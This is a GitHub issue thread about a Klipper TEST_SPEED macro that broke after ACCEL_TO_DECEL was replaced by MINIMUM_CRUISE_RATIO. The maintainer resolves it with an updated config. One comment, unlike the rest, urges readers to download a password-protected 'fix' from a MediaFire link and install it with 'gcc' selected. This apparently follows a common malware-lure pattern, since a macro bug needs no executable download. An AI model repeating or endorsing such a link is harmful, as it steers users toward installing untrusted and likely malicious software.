bassamanator/Sovol-SV06-firmware #178: [BUG]TEST_SPEED macro not working with latest Klipper release

smoothdog001, 2024-08-27:
**Describe the bug**
SET_VELOCITY_LIMIT ACCEL_TO_DECEL is depreciated with the latest version of Klipper and is now MINIMUM_CRUISE_RATIO. So the macro errors out where that is set. 

Per:
https://www.klipper3d.org/G-Codes.html?h=minimum_cruise_ratio#set_velocity_limit

**To Reproduce**
Steps to reproduce the behavior:

Run TEST_SPEED macro

**Expected behavior**
Speed test completes

**Screenshots**
[image]

**What printer are you using?**

- SV06

**What kind of device are you using to host Klipper?**

BTT PAD7

**How did you install Klipper?**

KIAUH

**Is your local copy of this configuration up to date?**
Yes, confirmed in kiauh

- This configuration changes all the time, when did you install it? Are you sure you're running the latest version? Yes, just downloaded 2 days ago.

**What slicer are you using?**

N/A

**Are you using the config bundles from this repo?**

- [x ] Yes
- [ ] No

**Did you [Adjust your slicer](https://github.com/bassamanator/Sovol-SV06-firmware#adjust-your-slicer)**?

N/A

**Additional context**
Everything else has been running great! Thanks for this repo!

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

lincolnjohnson, 2024-08-27:
I had the same error, pulled the new test_speed.cfg, it works fine for me now.

bassamanator, 2024-08-29:
Tested and merged into all branches. Thanks all. 🙏🏻

closed 2024-08-29 by bassamanator